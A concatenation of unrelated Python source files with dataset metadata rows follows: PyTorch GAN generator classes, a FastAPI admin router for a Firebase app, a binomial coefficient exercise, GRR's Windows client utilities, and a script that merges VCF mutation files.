nn.Conv2d(ngf * 4, ngf * 2, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(ngf * 2),
nn.ReLU(),
nn.Upsample(scale_factor=2),
#Input: [N, ngf * 2, 112, 112]
nn.Conv2d(ngf * 2, ngf, kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(ngf),
nn.ReLU(),
nn.Upsample(scale_factor=2),
#Input: [N, ngf, 224, 224]
nn.Conv2d(ngf, nc, kernel_size=3, stride=1, padding=1, bias=False),
nn.Tanh()
#Output: [N, nc, 224, 224]
)
def forward(self, x):
N = x.size(0)
#x = self.input(x.view(N, -1, 1, 1))
x = self.project(x)
x = self.main(x.view(N, -1, 7, 7))
return x
#Does Conv(ReLU(BN(Conv(UP(ReLU(BN(x))))))) + bypass(x), where bypass is UP and/or a 1x1 Conv matching the output shape
class ResBlockGenerator(nn.Module):
def __init__(self, in_channels, out_channels, stride=1):
super(ResBlockGenerator, self).__init__()
self.conv1 = nn.Conv2d(in_channels, out_channels, 3, 1, padding=1)
self.conv2 = nn.Conv2d(out_channels, out_channels, 3, 1, padding=1)
nn.init.xavier_uniform(self.conv1.weight.data, 1.)
nn.init.xavier_uniform(self.conv2.weight.data, 1.)
self.model = nn.Sequential(
nn.BatchNorm2d(in_channels),
nn.ReLU(),
nn.Upsample(scale_factor=2),
self.conv1,
nn.BatchNorm2d(out_channels),
nn.ReLU(),
self.conv2
)
residual = []
if stride != 1:
residual += [nn.Upsample(scale_factor=2)]
if in_channels != out_channels:
residual += [nn.Conv2d(in_channels, out_channels, 1, 1, padding=0)]
self.bypass = nn.Sequential(*residual)
def forward(self, x):
return self.model(x) + self.bypass(x)
class ResnetGenerator(nn.Module):
def __init__(self, nz, ngf, nc=3):
super(ResnetGenerator, self).__init__()
self.nz = nz
self.ngf = ngf
#Expect [N, nz] --> [N, 7 * 7 * ngf*32]
self.dense = nn.Linear(self.nz, 7 * 7 * 32*ngf)
#Expect [N, ngf, 224, 224] --> [N, 3, 224, 224]
self.final = nn.Conv2d(ngf, nc, 3, stride=1, padding=1)
nn.init.xavier_uniform(self.dense.weight.data, 1.)
nn.init.xavier_uniform(self.final.weight.data, 1.)
self.model = nn.Sequential(
#Input: [32*ngf, 7, 7]
ResBlockGenerator(32*ngf, 16*ngf, stride=2),
#Input: [16*ngf, 14, 14]
ResBlockGenerator(16*ngf, 8*ngf, stride=2),
#Input: [8*ngf, 28, 28]
ResBlockGenerator(8*ngf, 4*ngf, stride=2),
#Input: [4*ngf, 56, 56]
#NLBlockND(in_channels=4*ngf, dimension=2),
ResBlockGenerator(4*ngf, 2*ngf, stride=2),
#Input: [2*ngf, 112, 112]
ResBlockGenerator(2*ngf, ngf, stride=2),
#Input: [ngf, 224, 224]
nn.BatchNorm2d(ngf),
nn.ReLU(),
self.final,
#Input: [3, 224, 224]
nn.Tanh())
def forward(self, z):
N = z.size(0)
x = self.dense(z)
return self.model(x.view(N, -1, 7, 7))
class ResnetGenerator_small(nn.Module):
def __init__(self, nz, ngf, nc=3):
super(ResnetGenerator_small, self).__init__()
self.nz = nz
self.ngf = ngf
#Expect [N, nz] --> [N, 4 * 4 * ngf*16]
self.dense = nn.Linear(self.nz, 4 * 4 * 16*ngf)
#Expect [N, ngf, 224, 224] --> [N, 3, 224, 224]
self.final = nn.Conv2d(ngf, nc, 3, stride=1, padding=1)
nn.init.xavier_uniform(self.dense.weight.data, 1.)
nn.init.xavier_uniform(self.final.weight.data, 1.)
self.model = nn.Sequential(
#Input: [16*ngf, 4, 4]
ResBlockGenerator(16*ngf, 8*ngf, stride=2),
#Input: [8*ngf, 8, 8]
ResBlockGenerator(8*ngf, 4*ngf, stride=2),
#Input: [4*ngf, 16, 16]
ResBlockGenerator(4*ngf, 2*ngf, stride=2),
#Input: [2*ngf, 32, 32]
NLBlockND(in_channels=2*ngf, dimension=2),
ResBlockGenerator(2*ngf, ngf, stride=2),
#Input: [ngf, 64, 64]
nn.BatchNorm2d(ngf),
nn.ReLU(),
self.final,
#Input: [3, 64, 64]
nn.Tanh())
def forward(self, z):
N = z.size(0)
x = self.dense(z)
return self.model(x.view(N, -1, 4, 4))
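# Shape-check sketch (not part of the original file): ResnetGenerator grows
# 7x7 feature maps to 224x224 over five residual blocks, ResnetGenerator_small
# grows 4x4 to 64x64. nz/ngf below are arbitrary, and the check assumes the
# local non_local.NLBlockND import used above is available.
def _check_resnet_generator_shapes():
    import torch
    z = torch.randn(2, 64)
    assert ResnetGenerator(nz=64, ngf=4)(z).shape == (2, 3, 224, 224)
    assert ResnetGenerator_small(nz=64, ngf=4)(z).shape == (2, 3, 64, 64)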
| 32.92562 | 102 | 0.507781 |
4a1e58c998353f10f30995d425a978cd90b2eea7 | 1,787 | py | Python | src/gateau_api/routers/admin_authed.py | k2bd/gateau-api | b7fb1db8a9b6346b3ee7ebf4500d923996990e8b | [
"MIT"
] | null | null | null | src/gateau_api/routers/admin_authed.py | k2bd/gateau-api | b7fb1db8a9b6346b3ee7ebf4500d923996990e8b | [
"MIT"
] | 12 | 2022-02-03T20:36:05.000Z | 2022-03-27T11:29:06.000Z | src/gateau_api/routers/admin_authed.py | k2bd/gateau-api | b7fb1db8a9b6346b3ee7ebf4500d923996990e8b | [
"MIT"
] | null | null | null | """
Routes that you need to be logged in to use
"""
import logging
from typing import List
from fastapi import APIRouter, Depends
from firebase_admin import auth
from gateau_api.dependencies import get_user_uid
from gateau_api.dependencies.service import get_service
from gateau_api.dependencies.user import require_admin
from gateau_api.firebase import firebase_init_app
from gateau_api.service import GateauFirebaseService
from gateau_api.types import FirebaseUser, PokemonAvatar
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
router = APIRouter(
dependencies=[
Depends(get_user_uid),
Depends(require_admin),
]
)
firebase_init_app()
@router.get("/admin/users", response_model=List[FirebaseUser])
async def get_users(
service: GateauFirebaseService = Depends(get_service),
):
# TODO: paginate
users = auth.list_users().iterate_all()
results = []
for user in users:
avatars = await service.get_avatars(user.uid)
results.append(
FirebaseUser(
uid=user.uid,
claims=user.custom_claims,
display_name=user.display_name,
photo_url=user.photo_url,
email=user.email,
avatars=avatars,
)
)
return results
@router.post("/admin/avatar")
async def grant_avatar(
userId: str,
avatar: PokemonAvatar,
service: GateauFirebaseService = Depends(get_service),
):
await service.grant_avatar(user_id=userId, avatar=avatar)
@router.delete("/admin/avatar")
async def revoke_avatar(
userId: str,
avatar: PokemonAvatar,
service: GateauFirebaseService = Depends(get_service),
):
await service.revoke_avatar(user_id=userId, target_avatar=avatar)
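# Illustrative wiring sketch (not part of the original module): how this
# router might be mounted on a FastAPI app. Both route-level dependencies
# (get_user_uid, require_admin) then guard every /admin/* endpoint. The app
# below is a hypothetical example, not the project's real entry point.
def _build_example_app():
    from fastapi import FastAPI

    app = FastAPI()
    app.include_router(router)
    return app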
| 24.819444 | 69 | 0.705652 |
4a1e59700d52c988a0846ccb63714f3e5423a759 | 903 | py | Python | ex19_1.py | DexHunter/Think-Python-book-exercise-solutions | d0abae261eda1dca99043e17e8a1e614caad2140 | [
"CC-BY-4.0"
] | 24 | 2019-05-07T15:11:28.000Z | 2022-03-02T04:50:28.000Z | ex19_1.py | Dekzu/Think-Python-book-exercise-solutions | d0abae261eda1dca99043e17e8a1e614caad2140 | [
"CC-BY-4.0"
] | null | null | null | ex19_1.py | Dekzu/Think-Python-book-exercise-solutions | d0abae261eda1dca99043e17e8a1e614caad2140 | [
"CC-BY-4.0"
] | 19 | 2019-08-05T20:59:04.000Z | 2022-03-07T05:13:32.000Z | def binomial_coeff(n, k):
'''Compute the binomial coefficient
n: number of trials
k: number of successes
returns: int
'''
if k==0:
return 1
if n==0:
return 0
res = binomial_coeff(n-1, k) + binomial_coeff(n-1, k-1)
return res
def b(n, k, memo=None):
'''rewrite the function in a compact way
I failed to rewrite in conditional expression. :/
But this is the end of the course so meh. never mind
'''
    # share one memo dict across the recursive calls so the caching works
    if memo is None:
        memo = {}
if (n,k) in memo:
return memo[(n,k)]
if k==0:
return 1
if n==0:
return 0
    r = b(n-1, k, memo) + b(n-1, k-1, memo)
memo[(n,k)] = r
return r
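# Quick illustrative checks (not part of the original exercise): C(5, 2) = 10
# and C(3, 4) = 0, so both implementations should agree on them.
assert binomial_coeff(5, 2) == 10
assert b(5, 2) == 10
assert binomial_coeff(3, 4) == b(3, 4) == 0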
if __name__ == '__main__':
a = binomial_coeff(3,4)
# b(3,4) = b(2, 4) + b(2,3)
# b(2,4) = b(1,4) + b(1,3)
# b(1,4) = b(0,4) + b(0,3) = 0 + 0 = 0
# b(1,3) = b(0,3) + b(0,2) = 0 + 0 = 0
# b(2,3) = b(1,3) + b(1,2)
# b(1,2) = b(0,2) + b(0,1) = 0 + 0 = 0
print(a)
print(b(3,4))
c = binomial_coeff(10,4)
print(c)
print(b(10,4)) | 18.8125 | 56 | 0.545958 |
4a1e5a8405cd4fbe2e12131fc49aba8a2f400c23 | 12,973 | py | Python | grr/client/grr_response_client/client_utils_windows.py | nickamon/grr | ad1936c74728de00db90f6fafa47892b54cfc92d | [
"Apache-2.0"
] | null | null | null | grr/client/grr_response_client/client_utils_windows.py | nickamon/grr | ad1936c74728de00db90f6fafa47892b54cfc92d | [
"Apache-2.0"
] | 1 | 2018-05-08T21:15:51.000Z | 2018-05-08T21:15:51.000Z | grr/client/grr_response_client/client_utils_windows.py | nickamon/grr | ad1936c74728de00db90f6fafa47892b54cfc92d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Windows specific utils."""
import ctypes
import exceptions
import logging
import os
import re
import time
import _winreg
import ntsecuritycon
import pywintypes
import win32api
import win32file
import win32security
from google.protobuf import message
from grr import config
from grr_response_client.windows import process
from grr.lib import utils
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import paths as rdf_paths
DACL_PRESENT = 1
DACL_DEFAULT = 0
def CanonicalPathToLocalPath(path):
r"""Converts the canonical paths as used by GRR to OS specific paths.
Due to the inconsistencies between handling paths in windows we need to
convert a path to an OS specific version prior to using it. This function
should be called just before any OS specific functions.
Canonical paths on windows have:
- / instead of \.
- Begin with /X:// where X is the drive letter.
Args:
path: A canonical path specification.
Returns:
A windows specific path.
"""
# Account for raw devices
path = path.replace("/\\", "\\")
path = path.replace("/", "\\")
m = re.match(r"\\([a-zA-Z]):(.*)$", path)
if m:
path = "%s:\\%s" % (m.group(1), m.group(2).lstrip("\\"))
return path
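# Illustrative example (not part of the original module): the drive-letter
# rewrite described in the docstring above, checked with plain strings.
def _canonical_path_example():
  assert CanonicalPathToLocalPath("/C:/Windows/System32") == "C:\\Windows\\System32"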
def LocalPathToCanonicalPath(path):
"""Converts path from the local system's convention to the canonical."""
path_components = path.split("/")
result = []
for component in path_components:
# Devices must maintain their \\ so they do not get broken up.
m = re.match(r"\\\\.\\", component)
# The component is not special and can be converted as normal
if not m:
component = component.replace("\\", "/")
result.append(component)
return utils.JoinPath(*result)
def WinChmod(filename, acl_list, user=None):
"""Provide chmod-like functionality for windows.
Doco links:
goo.gl/n7YR1
goo.gl/rDv81
goo.gl/hDobb
Args:
filename: target filename for acl
acl_list: list of ntsecuritycon acl strings to be applied with bitwise OR.
e.g. ["FILE_GENERIC_READ", "FILE_GENERIC_WRITE"]
user: username string. If not specified we use the user we are running as.
Raises:
AttributeError: if a bad permission is passed
RuntimeError: if filename doesn't exist
"""
if user is None:
user = win32api.GetUserName()
if not os.path.exists(filename):
raise RuntimeError("filename %s does not exist" % filename)
acl_bitmask = 0
for acl in acl_list:
acl_bitmask |= getattr(ntsecuritycon, acl)
dacl = win32security.ACL()
win_user, _, _ = win32security.LookupAccountName("", user)
dacl.AddAccessAllowedAce(win32security.ACL_REVISION, acl_bitmask, win_user)
security_descriptor = win32security.GetFileSecurity(
filename, win32security.DACL_SECURITY_INFORMATION)
# Tell windows to set the acl and mark it as explicitly set
security_descriptor.SetSecurityDescriptorDacl(DACL_PRESENT, dacl,
DACL_DEFAULT)
win32security.SetFileSecurity(
filename, win32security.DACL_SECURITY_INFORMATION, security_descriptor)
def VerifyFileOwner(filename):
"""Verifies that <filename> is owned by the current user."""
# On Windows server OSs, files created by users in the
# Administrators group will be owned by Administrators instead of
# the user creating the file so this check won't work. Since on
# Windows GRR uses its own temp directory inside the installation
# dir, whenever someone can modify that dir it's already game over
# so this check doesn't add much.
del filename
return True
def FindProxies():
"""Tries to find proxies by interrogating all the user's settings.
This function is a modified urillib.getproxies_registry() from the
standard library. We just store the proxy value in the environment
for urllib to find it.
TODO(user): Iterate through all the possible values if one proxy
fails, in case more than one proxy is specified in different users
profiles.
Returns:
A list of proxies.
"""
proxies = []
for i in range(0, 100):
try:
sid = _winreg.EnumKey(_winreg.HKEY_USERS, i)
except exceptions.WindowsError:
break
try:
subkey = (
sid + "\\Software\\Microsoft\\Windows"
"\\CurrentVersion\\Internet Settings")
internet_settings = _winreg.OpenKey(_winreg.HKEY_USERS, subkey)
proxy_enable = _winreg.QueryValueEx(internet_settings, "ProxyEnable")[0]
if proxy_enable:
# Returned as Unicode but problems if not converted to ASCII
proxy_server = str(
_winreg.QueryValueEx(internet_settings, "ProxyServer")[0])
if "=" in proxy_server:
# Per-protocol settings
for p in proxy_server.split(";"):
protocol, address = p.split("=", 1)
# See if address has a type:// prefix
if not re.match("^([^/:]+)://", address):
address = "%s://%s" % (protocol, address)
proxies.append(address)
else:
# Use one setting for all protocols
if proxy_server[:5] == "http:":
proxies.append(proxy_server)
else:
proxies.append("http://%s" % proxy_server)
internet_settings.Close()
except (exceptions.WindowsError, ValueError, TypeError):
continue
logging.debug("Found proxy servers: %s", proxies)
return proxies
def GetRawDevice(path):
"""Resolves the raw device that contains the path.
Args:
path: A path to examine.
Returns:
A pathspec to read the raw device as well as the modified path to read
within the raw device. This is usually the path without the mount point.
Raises:
IOError: if the path does not exist or some unexpected behaviour occurs.
"""
path = CanonicalPathToLocalPath(path)
# Try to expand the shortened paths
try:
path = win32file.GetLongPathName(path)
except pywintypes.error:
pass
try:
mount_point = win32file.GetVolumePathName(path)
except pywintypes.error as details:
logging.info("path not found. %s", details)
raise IOError("No mountpoint for path: %s", path)
if not path.startswith(mount_point):
stripped_mp = mount_point.rstrip("\\")
if not path.startswith(stripped_mp):
raise IOError("path %s is not mounted under %s" % (path, mount_point))
corrected_path = LocalPathToCanonicalPath(path[len(mount_point):])
corrected_path = utils.NormalizePath(corrected_path)
volume = win32file.GetVolumeNameForVolumeMountPoint(mount_point).rstrip("\\")
volume = LocalPathToCanonicalPath(volume)
# The pathspec for the raw volume
result = rdf_paths.PathSpec(
path=volume,
pathtype=rdf_paths.PathSpec.PathType.OS,
mount_point=mount_point.rstrip("\\"))
return result, corrected_path
class NannyController(object):
"""Controls communication with the nanny."""
_service_key = None
synced = True
def _GetKey(self):
"""Returns the service key."""
if self._service_key is None:
hive = getattr(_winreg, config.CONFIG["Nanny.service_key_hive"])
path = config.CONFIG["Nanny.service_key"]
# Don't use _winreg.KEY_WOW64_64KEY since it breaks on Windows 2000
self._service_key = _winreg.CreateKeyEx(hive, path, 0,
_winreg.KEY_ALL_ACCESS)
return self._service_key
def Heartbeat(self):
"""Writes a heartbeat to the registry."""
try:
_winreg.SetValueEx(self._GetKey(), "Nanny.heartbeat", 0,
_winreg.REG_DWORD, int(time.time()))
    except exceptions.WindowsError as e:
logging.debug("Failed to heartbeat nanny at %s: %s",
config.CONFIG["Nanny.service_key"], e)
def WriteTransactionLog(self, grr_message):
"""Write the message into the transaction log.
Args:
grr_message: A GrrMessage instance.
"""
grr_message = grr_message.SerializeToString()
try:
_winreg.SetValueEx(self._GetKey(), "Transaction", 0, _winreg.REG_BINARY,
grr_message)
NannyController.synced = False
except exceptions.WindowsError:
pass
def SyncTransactionLog(self):
if not NannyController.synced:
_winreg.FlushKey(self._GetKey())
NannyController.synced = True
def CleanTransactionLog(self):
"""Wipes the transaction log."""
try:
_winreg.DeleteValue(self._GetKey(), "Transaction")
NannyController.synced = False
except exceptions.WindowsError:
pass
def GetTransactionLog(self):
"""Return a GrrMessage instance from the transaction log or None."""
try:
value, reg_type = _winreg.QueryValueEx(self._GetKey(), "Transaction")
except exceptions.WindowsError:
return
if reg_type != _winreg.REG_BINARY:
return
try:
return rdf_flows.GrrMessage.FromSerializedString(value)
except message.Error:
return
def GetNannyStatus(self):
try:
value, _ = _winreg.QueryValueEx(self._GetKey(), "Nanny.status")
except exceptions.WindowsError:
return None
return value
def GetNannyMessage(self):
try:
value, _ = _winreg.QueryValueEx(self._GetKey(), "Nanny.message")
except exceptions.WindowsError:
return None
return value
def ClearNannyMessage(self):
"""Wipes the nanny message."""
try:
_winreg.DeleteValue(self._GetKey(), "Nanny.message")
NannyController.synced = False
except exceptions.WindowsError:
pass
def StartNanny(self):
"""Not used for the Windows nanny."""
def StopNanny(self):
"""Not used for the Windows nanny."""
class Kernel32(object):
_kernel32 = None
def __init__(self):
if not Kernel32._kernel32:
Kernel32._kernel32 = ctypes.windll.LoadLibrary("Kernel32.dll")
@property
def kernel32(self):
return self._kernel32
def KeepAlive():
es_system_required = 0x00000001
kernel32 = Kernel32().kernel32
kernel32.SetThreadExecutionState(ctypes.c_int(es_system_required))
def RtlGetVersion(os_version_info_struct):
"""Wraps the lowlevel RtlGetVersion routine.
Args:
os_version_info_struct: instance of either a RTL_OSVERSIONINFOW structure
or a RTL_OSVERSIONINFOEXW structure,
ctypes.Structure-wrapped, with the
dwOSVersionInfoSize field preset to
ctypes.sizeof(self).
Raises:
    WindowsError: if the underlying routine fails.
See: https://msdn.microsoft.com/en-us/library/
windows/hardware/ff561910(v=vs.85).aspx .
"""
rc = ctypes.windll.Ntdll.RtlGetVersion(ctypes.byref(os_version_info_struct))
if rc != 0:
raise exceptions.WindowsError("Getting Windows version failed.")
class RtlOSVersionInfoExw(ctypes.Structure):
"""Wraps the lowlevel RTL_OSVERSIONINFOEXW struct.
See: https://msdn.microsoft.com/en-us/library/
windows/hardware/ff563620(v=vs.85).aspx .
"""
_fields_ = [("dwOSVersionInfoSize", ctypes.c_ulong), ("dwMajorVersion",
ctypes.c_ulong),
("dwMinorVersion",
ctypes.c_ulong), ("dwBuildNumber",
ctypes.c_ulong), ("dwPlatformId",
ctypes.c_ulong),
("szCSDVersion",
ctypes.c_wchar * 128), ("wServicePackMajor",
ctypes.c_ushort), ("wServicePackMinor",
ctypes.c_ushort),
("wSuiteMask", ctypes.c_ushort), ("wProductType",
ctypes.c_byte), ("wReserved",
ctypes.c_byte)]
def __init__(self, **kwargs):
kwargs["dwOSVersionInfoSize"] = ctypes.sizeof(self)
super(RtlOSVersionInfoExw, self).__init__(**kwargs)
def KernelVersion():
"""Gets the kernel version as string, eg. "5.1.2600".
Returns:
The kernel version, or "unknown" in the case of failure.
"""
rtl_osversioninfoexw = RtlOSVersionInfoExw()
try:
RtlGetVersion(rtl_osversioninfoexw)
except exceptions.WindowsError:
return "unknown"
return "%d.%d.%d" % (rtl_osversioninfoexw.dwMajorVersion,
rtl_osversioninfoexw.dwMinorVersion,
rtl_osversioninfoexw.dwBuildNumber)
def GetExtAttrs(filepath):
"""Does nothing.
This is kept for compatibility with other platform-specific version of this
function.
Args:
filepath: Unused.
Returns:
An empty list.
"""
del filepath # Unused on Windows.
return []
def OpenProcessForMemoryAccess(pid=None):
return process.Process(pid=pid)
def MemoryRegions(proc, options):
for start, length in proc.Regions(
skip_special_regions=options.skip_special_regions):
yield start, length
| 29.152809 | 80 | 0.663147 |
4a1e5b812ffc515ba7602fa347e67023898a6a25 | 12,269 | py | Python | merge_vcf_files.py | martynaut/mirnome-mutations | 2bcee735a3620a0ae6fc91a57500f19b8851ff60 | [
"MIT"
] | null | null | null | merge_vcf_files.py | martynaut/mirnome-mutations | 2bcee735a3620a0ae6fc91a57500f19b8851ff60 | [
"MIT"
] | 1 | 2021-09-10T12:07:49.000Z | 2021-09-24T07:04:02.000Z | merge_vcf_files.py | martynaut/mirnome-mutations | 2bcee735a3620a0ae6fc91a57500f19b8851ff60 | [
"MIT"
] | null | null | null | import click
import gzip
import pandas as pd
import os
import shutil
from prepare_vcf_files_helpers import update_dict_with_file, change_format, change_info
pd.options.mode.chained_assignment = None
def make_unique_files(input_folder, output_folder, copy_input):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
else:
click.echo("Cleaning output folder")
for filename in os.listdir(output_folder):
file_path = os.path.join(output_folder, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete {}. Reason: {}'.format(file_path, e))
if not os.path.exists(output_folder + '/temp'):
os.makedirs(output_folder + '/temp')
files = [[x[0] + '/' + y for y in x[2]] for x in os.walk(input_folder)]
flat_files = [file for sublist in files for file in sublist]
gz_files = [file for file in flat_files if file.endswith('vcf.gz')]
if not gz_files:
print("No vcf.gz files in the directory")
return 1
dict_with_files = {}
for gz_file in gz_files:
dict_with_files = update_dict_with_file(gz_file, dict_with_files)
df_dict_with_files = pd.DataFrame.from_dict(dict_with_files, orient='index')
df_dict_with_files.index.name = 'filename'
df_dict_with_files.to_csv(output_folder + '/files_summary_before_merging.csv', sep=',')
df_dict_with_files_grouped = df_dict_with_files.reset_index().groupby(['indiv_name',
'type_of_file']).agg('nunique')
df_dict_with_files_grouped.to_csv(output_folder + '/files_summary_count_per_patient_before_merging.csv', sep=',')
df_not_unique_patients = df_dict_with_files_grouped.loc[df_dict_with_files_grouped['filename'] != 1, :]
df_not_unique_patients.to_csv(output_folder + '/not_unique_patients.csv', sep=',')
with open(output_folder+'/do_not_use.txt', 'w+') as do_not_use_file:
for patient in list(df_not_unique_patients.unstack().index.unique()):
this_patient = df_not_unique_patients.xs(patient, level=0)
for file_type in list(this_patient.index.unique()):
first = True
with open(output_folder + '/temp/' + patient+'_'+file_type+'.vcf', 'wb') as combined:
temp_df = df_dict_with_files.loc[(df_dict_with_files['indiv_name'] == patient) &
(df_dict_with_files['type_of_file'] == file_type), :]
lines_df = pd.DataFrame()
columns = []
for filename in list(temp_df.index.unique()):
print(filename)
do_not_use_file.write(filename+'\n')
with gzip.open(filename) as f:
for line in f.readlines():
dline = line.decode('ascii')
if dline.startswith('##') and first:
combined.write(line)
elif dline.startswith('##'):
pass
elif dline.startswith('#') and first:
combined.write(line)
columns = dline.replace('#', '').strip().split('\t')
elif dline.startswith('#'):
columns = dline.replace('#', '').strip().split('\t')
else:
new_record = \
pd.DataFrame([dline.replace('\n',
'').replace(';',
':').replace('"',
'').split('\t')],
columns=columns)
new_columns_normal = new_record['NORMAL'].str.split(":", expand=True)
normal_columns = list(map(lambda x: x + '_normal',
new_record['FORMAT'].str.strip().str.split(":").
values[0]))
try:
new_columns_normal.columns = normal_columns
except ValueError:
normal_columns.remove('SS_normal')
new_columns_normal.columns = normal_columns
new_record = pd.concat([new_record, new_columns_normal], axis=1)
new_columns_tumor = new_record['TUMOR'].str.split(":", expand=True)
tumor_columns = list(map(lambda x: x + '_tumor',
new_record['FORMAT'].str.strip().str.split(":").
values[0]))
new_columns_tumor.columns = tumor_columns
new_record = pd.concat([new_record, new_columns_tumor], axis=1)
lines_df = pd.concat([lines_df, new_record])
first = False
lines_df = lines_df[lines_df['FILTER'].str.contains('PASS')]
filter_columns = list(lines_df.columns)
filter_columns.remove('CHROM')
filter_columns.remove('POS')
filter_columns.remove('ID')
filter_columns.remove('REF')
filter_columns.remove('ALT')
filter_columns_names = list(set(list(map(lambda x: x.replace('_tumor', '').replace('_normal', ''),
filter_columns))))
filter_columns_names.remove('FORMAT')
filter_columns_names.remove('FILTER')
filter_columns_names.remove('TUMOR')
filter_columns_names.remove('NORMAL')
filter_columns_names.remove('QUAL')
filter_columns_names.remove('INFO')
if 'SS' in filter_columns_names:
filter_columns_names.remove('SS')
filter_columns_names.append('SS')
format_all = ':'.join(filter_columns_names)
lines_df['FORMAT'] = format_all
group_dict = {
'INFO': lambda x: change_info(x, file_type),
'AD_normal': lambda x: change_format(x, file_type, 'AD_normal'),
'AD_tumor': lambda x: change_format(x, file_type, 'AD_tumor'),
'BQ_normal': lambda x: change_format(x, file_type, 'BQ_normal'),
'BQ_tumor': lambda x: change_format(x, file_type, 'BQ_tumor'),
'QSS_normal': lambda x: change_format(x, file_type, 'QSS_normal'),
'QSS_tumor': lambda x: change_format(x, file_type, 'QSS_tumor'),
'BCOUNT_normal': lambda x: change_format(x, file_type, 'BCOUNT_normal'),
'BCOUNT_tumor': lambda x: change_format(x, file_type, 'BCOUNT_tumor'),
'SSC_normal': lambda x: change_format(x, file_type, 'SSC_normal'),
'SSC_tumor': lambda x: change_format(x, file_type, 'SSC_tumor'),
'RD_normal': lambda x: change_format(x, file_type, 'RD_normal'),
'RD_tumor': lambda x: change_format(x, file_type, 'RD_tumor')
}
for col in filter_columns:
if col in ['AD_normal', 'AD_tumor',
'BQ_normal', 'BQ_tumor',
'QSS_normal', 'QSS_tumor',
'BCOUNT_normal', 'BCOUNT_tumor',
'SSC_normal', 'SSC_tumor',
'RD_normal', 'RD_tumor']:
continue
else:
group_dict[col] = 'first'
for col in ['AD_normal', 'AD_tumor',
'BQ_normal', 'BQ_tumor',
'QSS_normal', 'QSS_tumor',
'BCOUNT_normal', 'BCOUNT_tumor',
'SSC_normal', 'SSC_tumor',
'RD_normal', 'RD_tumor']:
if col not in filter_columns:
del group_dict[col]
lines_df_grouped = lines_df.groupby(['CHROM', 'POS', 'ID',
'REF',
'ALT']).agg(group_dict).reset_index()
normal_filter_column_names = filter_columns_names.copy()
try:
normal_filter_column_names.remove('SS')
except ValueError:
pass
lines_df_grouped['NORMAL'] = lines_df_grouped.apply(lambda x: ':'.join(
map(lambda y: '' if str(y) == 'nan' else str(y),
[x[col_name] for col_name in list(map(
lambda y: y + '_normal', normal_filter_column_names))])
), axis=1)
lines_df_grouped['TUMOR'] = lines_df_grouped.apply(lambda x: ':'.join(
map(lambda y: '' if str(y) == 'nan' else str(y),
[x[col_name] for col_name in list(map(lambda y: y + '_tumor', filter_columns_names))])
), axis=1)
lines_df_grouped = lines_df_grouped[columns]
for index, row in lines_df_grouped.iterrows():
combined.write('\t'.join(row.tolist()).encode('utf-8')+b'\n')
with open(output_folder + '/temp/' + patient+'_'+file_type+'.vcf', 'rb') as combined, \
gzip.open(output_folder + '/' + patient+'_'+file_type+'.vcf.gz', 'wb') as f_out:
shutil.copyfileobj(combined, f_out)
with open(output_folder + '/do_not_use.txt', 'r') as file_dont:
do_not_use = []
for line in file_dont.readlines():
do_not_use.append(line.strip())
gz_files_single = []
for file in gz_files:
if file[-6:] == 'vcf.gz' and file not in do_not_use:
gz_files_single.append(file)
for file in gz_files_single:
if copy_input == 1:
shutil.copyfile(file, output_folder + '/' + file.split('/')[-1])
else:
shutil.move(file, output_folder + '/' + file.split('/')[-1])
click.echo("Cleaning temp folder")
for filename in os.listdir(output_folder + '/temp'):
file_path = os.path.join(output_folder + '/temp', filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete {}. Reason: {}'.format(file_path, e))
@click.command()
@click.argument('input_folder')
@click.argument('output_folder')
@click.option('--copy_input', '-c')
def main(input_folder, output_folder, copy_input=''):
if not copy_input:
copy_input = 0
copy_input = int(copy_input)
make_unique_files(input_folder, output_folder, copy_input)
if __name__ == "__main__":
main()
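# Illustrative invocation (hypothetical paths, not part of the original script):
#   python merge_vcf_files.py /data/vcf_in /data/vcf_out --copy_input 1
# merges duplicate per-patient vcf.gz files from /data/vcf_in into
# /data/vcf_out; --copy_input 1 copies (rather than moves) the already
# unique input files.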
| 54.048458 | 118 | 0.482109 |
4a1e5bcca3f2c77d50129d61870bb330f4ce996a | 1,319 | py | Python | tdl/migrations/0004_auto_20181214_0633.py | chrstsrs/ToDoList | 8e13c5a8f6cabad0cf3f715ba9134dd82a46cc3e | [
"MIT"
] | 1 | 2019-01-18T07:47:04.000Z | 2019-01-18T07:47:04.000Z | tdl/migrations/0004_auto_20181214_0633.py | chrstsrs/ToDoList | 8e13c5a8f6cabad0cf3f715ba9134dd82a46cc3e | [
"MIT"
] | 6 | 2020-02-11T23:33:32.000Z | 2022-03-11T23:38:01.000Z | tdl/migrations/0004_auto_20181214_0633.py | chrstsrs/todolist | 8e13c5a8f6cabad0cf3f715ba9134dd82a46cc3e | [
"MIT"
] | null | null | null | # Generated by Django 2.1.2 on 2018-12-14 06:33
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('tdl', '0003_auto_20181129_2059'),
]
operations = [
migrations.CreateModel(
name='Preferences',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('show_all', models.BooleanField(default=False)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='+', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AlterField(
model_name='task',
name='done_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='task',
name='issued_by',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='issued', to=settings.AUTH_USER_MODEL),
),
]
| 37.685714 | 153 | 0.621683 |
4a1e5c6ee93184e15a30a113dee8b425f896e8bf | 460 | py | Python | bikes/bikes.py | sethmenghi/cosc288-machine-learning | 4f17a3fe7229ded4c0fc42e9ee3595e6a07f26eb | [
"0BSD"
